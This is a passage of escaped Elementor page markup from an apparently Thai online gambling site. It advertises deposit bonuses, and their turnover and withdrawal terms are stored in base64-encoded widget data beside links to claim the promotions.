ZTM0XHUwZTE5XHUwZTE3XHUwZTM4XHUwZTAxXHUwZTA0XHUwZTIzXHUwZTMxXHUwZTQ5XHUwZTA3XHUwZTAxXHUwZTQ4XHUwZTJkXHUwZTE5XHUwZTQwXHUwZTIzXHUwZTM0XHUwZTQ4XHUwZTIxXHUwZTQwXHUwZTE0XHUwZTM0XHUwZTIxXHUwZTFlXHUwZTMxXHUwZTE5IFx1MGU0MVx1MGUyNVx1MGUzMFx1MGU0MFx1MGUxYlx1MGUzNFx1MGUxNFx1MGU0M1x1MGUyYlx1MGU0OVx1MGUxYVx1MGUyM1x1MGUzNFx1MGUwMVx1MGUzMlx1MGUyM1x1MGUyYVx1MGUzM1x1MGUyYlx1MGUyM1x1MGUzMVx1MGUxYVx1MGUxY1x1MGUzOVx1MGU0OVx1MGUxN1x1MGUzNVx1MGU0OFx1MGUyMVx1MGUzNVx1MGUyZFx1MGUzMlx1MGUyMlx1MGUzOCAxOCBcdTBlMWJcdTBlMzVcdTBlMDJcdTBlMzZcdTBlNDlcdTBlMTlcdTBlNDRcdTBlMWJcdTBlNDBcdTBlMTdcdTBlNDhcdTBlMzJcdTBlMTlcdTBlMzFcdTBlNDlcdTBlMTkgXHUwZTQwXHUwZTFlXHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTQzXHUwZTJiXHUwZTQ5XHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTJhXHUwZTE5XHUwZTM4XHUwZTAxXHUwZTIxXHUwZTMyXHUwZTA0XHUwZTM5XHUwZTQ4XHUwZTAxXHUwZTMxXHUwZTFhXHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTIzXHUwZTMxXHUwZTFhXHUwZTFjXHUwZTM0XHUwZTE0XHUwZTBhXHUwZTJkXHUwZTFhXHUwZTQxXHUwZTI1XHUwZTMwXHUwZTA0XHUwZTI3XHUwZTMyXHUwZTIxXHUwZTFiXHUwZTI1XHUwZTJkXHUwZTE0XHUwZTIwXHUwZTMxXHUwZTIyXHUwZTQxXHUwZTFhXHUwZTFhXHUwZTA4XHUwZTIzXHUwZTM0XHUwZTA3XHUwZTA4XHUwZTMxXHUwZTA3PFwvcD4ifSwiZWxlbWVudHMiOltdLCJ3aWRnZXRUeXBlIjoidGV4dC1lZGl0b3IifQ==\\\"]\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-36a351d elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"36a351d\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-77587d0\\\" data-id=\\\"77587d0\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-3b12e8f elementor-widget elementor-widget-image\\\" data-id=\\\"3b12e8f\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-346\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/20-get-100-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-f1ccc77 elementor-widget elementor-widget-heading\\\" data-id=\\\"f1ccc77\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e42\\u0e1b\\u0e23 20 \\u0e23\\u0e31\\u0e1a 100<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjAxZWZkNjIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIj5cdTBlMWRcdTBlMzJcdTBlMDEgMjAgXHUyMTkyIFx1MGUyM1x1MGUzMVx1MGUxYVx1MGU0MFx1MGUxZVx1MGUzNFx1MGU0OFx1MGUyMSA4MCA9IFx1MGUyM1x1MGUyN1x1MGUyMSAxMDAgXC8gXHUwZTE3XHUwZTMzXHUwZTQwXHUwZTE3XHUwZTM0XHUwZTIzXHUwZTRjXHUwZTE5IDggXHUwZTQwXHUwZTE3XHUwZTQ4XHUwZTMyIFwvIFx1MGUxNlx1MGUyZFx1MGUxOVx1MGU0NFx1MGUxNFx1MGU0OVx1MGUyYVx1MGUzOVx1MGUwN1x1MGUyYVx1MGUzOFx1MGUxNCAyMDA8XC9wPjxwPjxzcGFuIHN0eWxlPVwidGV4dC1kZWNvcmF0aW9uOiB1bmRlcmxpbmU7XCI+PHN0cm9uZz5cdTBlMmFcdTBlMjNcdTBlMzhcdTBlMWJcdTBlNDBcdTBlMDdcdTBlMzdcdTBlNDhcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMDI8XC9zdHJvbmc+PFwvc3Bhbj48XC9wPjx1bD48bGk+PHN0cm9uZyBkYXRhLXN0YXJ0PVwiOTk2XCIgZGF0YS1lbmQ9XCIxMDEyXCI+XHUwZTAxXHUwZTMyXHUwZTIzXHUwZTE3XHUwZTMzXHUwZTQwXHUwZTE3XHUwZTM0XHUwZTIzXHUwZTRjXHUwZTE5PFwvc3Ryb25nPlx1MDBhMDggXHUwZTQwXHUwZTE3XHUwZTQ4XHUwZTMyIFx1MGUwMlx1MGUyZFx1MGUwN1x1MGUyMlx1MGUyZFx1MGUxNFx1MGUyM1x1MGUyN1x1MGUyMTxcL2xpPjxsaT5cdTBlNDBcdTBlMDlcdTBlMWVcdTBlMzJcdTBlMzBcdTBlMmFcdTBlMjVcdTBlNDdcdTBlMmRcdTBlMTVcdTBlNDBcdTBlMTdcdTBlNDhcdTBlMzJcdTBlMTlcdTBlMzFcdTBlNDlcdTBlMTk8XC9saT48bGk+XHUwZTJiXHUwZTQ5XHUwZTMyXHUwZTIxXHUwZTBiXHUwZTM3XHUwZTQ5XHUwZTJkXHUwZTFmXHUwZTIzXHUwZTM1XHUwZTJhXHUwZTFiXHUwZTM0XHUwZTE5PFwvbGk+PFwvdWw+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0=\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-4f359e1 elementor-align-center elementor-widget elementor-widget-button\\\" data-id=\\\"4f359e1\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm\\\" href=\\\"http:\\/\\/luca333line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-icon\\\">\\n\\t\\t\\t\\t<svg aria-hidden=\\\"true\\\" class=\\\"e-font-icon-svg e-fas-gift\\\" viewBox=\\\"0 0 512 512\\\" xmlns=\\\"http:\\/\\/www.w3.org\\/2000\\/svg\\\"><path d=\\\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\\\"><\\/path><\\/svg>\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-e591d78\\\" data-id=\\\"e591d78\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-3e9ff8e elementor-widget elementor-widget-image\\\" data-id=\\\"3e9ff8e\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-347\\\" alt=\\\"\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/79-get-200-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-d853dea elementor-widget elementor-widget-heading\\\" data-id=\\\"d853dea\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e42\\u0e1b\\u0e23 79 \\u0e23\\u0e31\\u0e1a 200<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjJlYTdmYzIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIj5cdTBlMWRcdTBlMzJcdTBlMDEgNzkgXHUyMTkyIFx1MGUyM1x1MGUzMVx1MGUxYVx1MGU0MFx1MGUxZVx1MGUzNFx1MGU0OFx1MGUyMSAxMjEgPSBcdTBlMjNcdTBlMjdcdTBlMjEgMjAwIFwvIFx1MGUxN1x1MGUzM1x1MGU0MFx1MGUxN1x1MGUzNFx1MGUyM1x1MGU0Y1x1MGUxOSA3IFx1MGU0MFx1MGUxN1x1MGU0OFx1MGUzMiBcLyBcdTBlMTZcdTBlMmRcdTBlMTlcdTBlNDRcdTBlMTRcdTBlNDlcdTBlMmFcdTBlMzlcdTBlMDdcdTBlMmFcdTBlMzhcdTBlMTQgNjAwPFwvcD48cD48c3BhbiBzdHlsZT1cInRleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO1wiPjxzdHJvbmc+XHUwZTJhXHUwZTIzXHUwZTM4XHUwZTFiXHUwZTQwXHUwZTA3XHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTE5XHUwZTQ0XHUwZTAyPFwvc3Ryb25nPjxcL3NwYW4+PFwvcD48dWw+PGxpIGRhdGEtc3RhcnQ9XCI3OThcIiBkYXRhLWVuZD1cIjgzN1wiPjxzdHJvbmcgZGF0YS1zdGFydD1cIjk5NlwiIGRhdGEtZW5kPVwiMTAxMlwiPlx1MGUwMVx1MGUzMlx1MGUyM1x1MGUxN1x1MGUzM1x1MGU0MFx1MGUxN1x1MGUzNFx1MGUyM1x1MGU0Y1x1MGUxOTxcL3N0cm9uZz5cdTAwYTA3IFx1MGU0MFx1MGUxN1x1MGU0OFx1MGUzMiBcdTBlMDJcdTBlMmRcdTBlMDdcdTBlMjJcdTBlMmRcdTBlMTRcdTBlMjNcdTBlMjdcdTBlMjE8XC9saT48bGkgZGF0YS1zdGFydD1cIjc5OFwiIGRhdGEtZW5kPVwiODM3XCI+XHUwZTQwXHUwZTA5XHUwZTFlXHUwZTMyXHUwZTMwXHUwZTJhXHUwZTI1XHUwZTQ3XHUwZTJkXHUwZTE1XHUwZTQwXHUwZTE3XHUwZTQ4XHUwZTMyXHUwZTE5XHUwZTMxXHUwZTQ5XHUwZTE5PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCI3OThcIiBkYXRhLWVuZD1cIjgzN1wiPlx1MGUyYlx1MGU0OVx1MGUzMlx1MGUyMVx1MGUwYlx1MGUzN1x1MGU0OVx1MGUyZFx1MGUxZlx1MGUyM1x1MGUzNVx1MGUyYVx1MGUxYlx1MGUzNFx1MGUxOTxcL2xpPjxcL3VsPiJ9LCJlbGVtZW50cyI6W10sIndpZGdldFR5cGUiOiJ0ZXh0LWVkaXRvciJ9\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-883800f elementor-align-center elementor-widget elementor-widget-button\\\" data-id=\\\"883800f\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm\\\" href=\\\"http:\\/\\/luca333line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-icon\\\">\\n\\t\\t\\t\\t<svg aria-hidden=\\\"true\\\" class=\\\"e-font-icon-svg e-fas-gift\\\" viewBox=\\\"0 0 512 512\\\" xmlns=\\\"http:\\/\\/www.w3.org\\/2000\\/svg\\\"><path d=\\\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\\\"><\\/path><\\/svg>\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/section>\\n\\t\\t\\t\\t<section class=\\\"elementor-section elementor-top-section elementor-element elementor-element-49fe62a elementor-section-boxed elementor-section-height-default elementor-section-height-default\\\" data-id=\\\"49fe62a\\\" data-element_type=\\\"section\\\" data-e-type=\\\"section\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-container elementor-column-gap-default\\\">\\n\\t\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-fc4dc04\\\" data-id=\\\"fc4dc04\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-b25769f elementor-widget elementor-widget-image\\\" data-id=\\\"b25769f\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-350\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Bonus-free-100_-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-4e0d99f elementor-widget elementor-widget-heading\\\" data-id=\\\"4e0d99f\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">\\u0e42\\u0e1b\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e21\\u0e1a\\u0e31\\u0e2a 100%<\\/h2>\\t\\t\\t\\t<\\/div>\\n\\t\\t[elementor-element k=\\\"98f3ea6f5123c692158e8167bedfd4ac\\\" data=\\\"eyJpZCI6IjIwY2JlMzIiLCJlbFR5cGUiOiJ3aWRnZXQiLCJzZXR0aW5ncyI6eyJlZGl0b3IiOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIiBkYXRhLXN0YXJ0PVwiNjk2XCIgZGF0YS1lbmQ9XCI3NDBcIj48c3Ryb25nIGRhdGEtc3RhcnQ9XCI2OTZcIiBkYXRhLWVuZD1cIjcxMVwiPlx1MGUwNFx1MGUzOFx1MGU0OVx1MGUyMVx1MGUyYVx1MGUyZFx1MGUwN1x1MGU0MFx1MGUxNFx1MGU0OVx1MGUwNzxcL3N0cm9uZz4gXHUwZTQwXHUwZTE1XHUwZTM0XHUwZTIxXHUwZTQwXHUwZTE3XHUwZTQ4XHUwZTMyXHUwZTQ0XHUwZTIzXHUwZTIzXHUwZTMxXHUwZTFhXHUwZTQwXHUwZTFlXHUwZTM0XHUwZTQ4XHUwZTIxXHUwZTQwXHUwZTE3XHUwZTQ4XHUwZTMyXHUwZTE5XHUwZTMxXHUwZTQ5XHUwZTE5PFwvcD48dWw+PGxpIGRhdGEtc3RhcnQ9XCI2OTZcIiBkYXRhLWVuZD1cIjc0MFwiPjxzdHJvbmcgZGF0YS1zdGFydD1cIjc0M1wiIGRhdGEtZW5kPVwiNzU4XCI+MTAwIFx1MGUyM1x1MGUzMVx1MGUxYSAyMDA8XC9zdHJvbmc+PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCI2OTZcIiBkYXRhLWVuZD1cIjc0MFwiPjxzdHJvbmcgZGF0YS1zdGFydD1cIjc2M1wiIGRhdGEtZW5kPVwiNzgwXCI+NTAwIFx1MGUyM1x1MGUzMVx1MGUxYSAxLDAwMDxcL3N0cm9uZz48XC9saT48XC91bD48cD48c3BhbiBzdHlsZT1cInRleHQtZGVjb3JhdGlvbjogdW5kZXJsaW5lO1wiPjxzdHJvbmc+XHUwZTJhXHUwZTIzXHUwZTM4XHUwZTFiXHUwZTQwXHUwZTA3XHUwZTM3XHUwZTQ4XHUwZTJkXHUwZTE5XHUwZTQ0XHUwZTAyPFwvc3Ryb25nPjxcL3NwYW4+PFwvcD48dWw+PGxpIGRhdGEtc3RhcnQ9XCI3OThcIiBkYXRhLWVuZD1cIjgzN1wiPjxzdHJvbmcgZGF0YS1zdGFydD1cIjc5OFwiIGRhdGEtZW5kPVwiODEzXCI+XHUwZTE3XHUwZTMzIDYgXHUwZTQwXHUwZTE3XHUwZTM0XHUwZTIzXHUwZTRjXHUwZTE5PFwvc3Ryb25nPiwgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiODE1XCIgZGF0YS1lbmQ9XCI4MzVcIj5cdTBlMTZcdTBlMmRcdTBlMTlcdTBlMmFcdTBlMzlcdTBlMDdcdTBlMmFcdTBlMzhcdTBlMTQgMyBcdTBlNDBcdTBlMTdcdTBlNDhcdTBlMzI8XC9zdHJvbmc+PFwvbGk+PGxpIGRhdGEtc3RhcnQ9XCI3OThcIiBkYXRhLWVuZD1cIjgzN1wiPlx1MGUwMVx1MGU0OFx1MGUyZFx1MGUxOVx1MGUxNlx1MGUyZFx1MGUxOSA8c3Ryb25nIGRhdGEtc3RhcnQ9XCI4NDhcIiBkYXRhLWVuZD1cIjg4NlwiPlx1MGUyM1x1MGUzMFx1MGUxYVx1MGUxYVx1MGUxNVx1MGUzMVx1MGUxNFx1MGU0MFx1MGUwNFx1MGUyM1x1MGUxNFx1MGUzNFx1MGUxNVx1MGU0Mlx1MGUxYlx1MGUyM1x1MGU0Mlx1MGUyMVx1MGUwYVx1MGUzMVx1MGU0OFx1MGUxOSAoXHUwZTJhXHUwZTQ4XHUwZTI3XHUwZTE5XHUwZTQyXHUwZTFhXHUwZTE5XHUwZTMxXHUwZTJhKTxcL3N0cm9uZz4gXHUwZTJkXHUwZTJkXHUwZTAxXHUwZTQyXHUwZTE0XHUwZTIyXHUwZTJkXHUwZTMxXHUwZTE1XHUwZTQyXHUwZTE5XHUwZTIxXHUwZTMxXHUwZTE1XHUwZTM0IFx1MGU0MFx1MGUyYlx1MGUyNVx1MGUzN1x1MGUyZFx1MGUyMlx1MGUyZFx1MGUxNFx1MGU0MFx1MGUwN1x1MGUzNFx1MGUxOVx1MGUwOFx1MGUyM1x1MGUzNFx1MGUwN1x1MGUyYVx1MGUzM1x1MGUyYlx1MGUyM1x1MGUzMVx1MGUxYVx1MGUxNlx1MGUyZFx1MGUxOTxcL2xpPjxsaSBkYXRhLXN0YXJ0PVwiNzk4XCIgZGF0YS1lbmQ9XCI4MzdcIj5cdTBlMDhcdTBlMzNcdTBlMDFcdTBlMzFcdTBlMTRcdTBlMmFcdTBlMzRcdTBlMTdcdTBlMThcdTBlMzRcdTBlNGMgPHN0cm9uZyBkYXRhLXN0YXJ0PVwiOTQ1XCIgZGF0YS1lbmQ9XCI5NjdcIj4xIFx1MGUwNFx1MGUyM1x1MGUzMVx1MGU0OVx1MGUwN1wvXHUwZTI3XHUwZTMxXHUwZTE5XC9cdTBlMWNcdTBlMzlcdTBlNDlcdTBlNDNcdTBlMGFcdTBlNDk8XC9zdHJvbmc+PFwvbGk+PFwvdWw+In0sImVsZW1lbnRzIjpbXSwid2lkZ2V0VHlwZSI6InRleHQtZWRpdG9yIn0=\\\"]\\t\\t<div class=\\\"elementor-element elementor-element-82869dd elementor-align-center elementor-widget elementor-widget-button\\\" data-id=\\\"82869dd\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"button.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<a class=\\\"elementor-button elementor-button-link elementor-size-sm\\\" href=\\\"http:\\/\\/luca333line.com\\\" target=\\\"_blank\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-content-wrapper\\\">\\n\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-icon\\\">\\n\\t\\t\\t\\t<svg aria-hidden=\\\"true\\\" class=\\\"e-font-icon-svg e-fas-gift\\\" viewBox=\\\"0 0 512 512\\\" xmlns=\\\"http:\\/\\/www.w3.org\\/2000\\/svg\\\"><path d=\\\"M32 448c0 17.7 14.3 32 32 32h160V320H32v128zm256 32h160c17.7 0 32-14.3 32-32V320H288v160zm192-320h-42.1c6.2-12.1 10.1-25.5 10.1-40 0-48.5-39.5-88-88-88-41.6 0-68.5 21.3-103 68.3-34.5-47-61.4-68.3-103-68.3-48.5 0-88 39.5-88 88 0 14.5 3.8 27.9 10.1 40H32c-17.7 0-32 14.3-32 32v80c0 8.8 7.2 16 16 16h480c8.8 0 16-7.2 16-16v-80c0-17.7-14.3-32-32-32zm-326.1 0c-22.1 0-40-17.9-40-40s17.9-40 40-40c19.9 0 34.6 3.3 86.1 80h-86.1zm206.1 0h-86.1c51.4-76.5 65.7-80 86.1-80 22.1 0 40 17.9 40 40s-17.9 40-40 40z\\\"><\\/path><\\/svg>\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t<span class=\\\"elementor-button-text\\\">\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19 \\u0e04\\u0e25\\u0e34\\u0e01\\u0e40\\u0e25\\u0e22<\\/span>\\n\\t\\t\\t\\t\\t<\\/span>\\n\\t\\t\\t\\t\\t<\\/a>\\n\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-column elementor-col-50 elementor-top-column elementor-element elementor-element-174fb16\\\" data-id=\\\"174fb16\\\" data-element_type=\\\"column\\\" data-e-type=\\\"column\\\" data-settings=\\\"{"background_background":"classic"}\\\">\\n\\t\\t\\t<div class=\\\"elementor-widget-wrap elementor-element-populated\\\">\\n\\t\\t\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-498b0c4 elementor-widget elementor-widget-image\\\" data-id=\\\"498b0c4\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"image.default\\\">\\n\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<img width=\\\"1200\\\" height=\\\"500\\\" src=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18.webp\\\" class=\\\"attachment-full size-full wp-image-355\\\" alt=\\\"\\\" srcset=\\\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18.webp 1200w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18-300x125.webp 300w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18-1024x427.webp 1024w, https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/HBD-Banner-AMB18-768x320.webp 768w\\\" sizes=\\\"(max-width: 1200px) 100vw, 1200px\\\" \\/>\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t\\t<\\/div>\\n\\t\\t\\t\\t<div class=\\\"elementor-element elementor-element-ae3dca7 elementor-widget elementor-widget-heading\\\" data-id=\\\"ae3dca7\\\" data-element_type=\\\"widget\\\" data-e-type=\\\"widget\\\" data-widget_type=\\\"heading.default\\\">\\n\\t\\t\\t\\t\\t<h2 class=\\\"elementor-heading-title elementor-size-default\\\">Happy 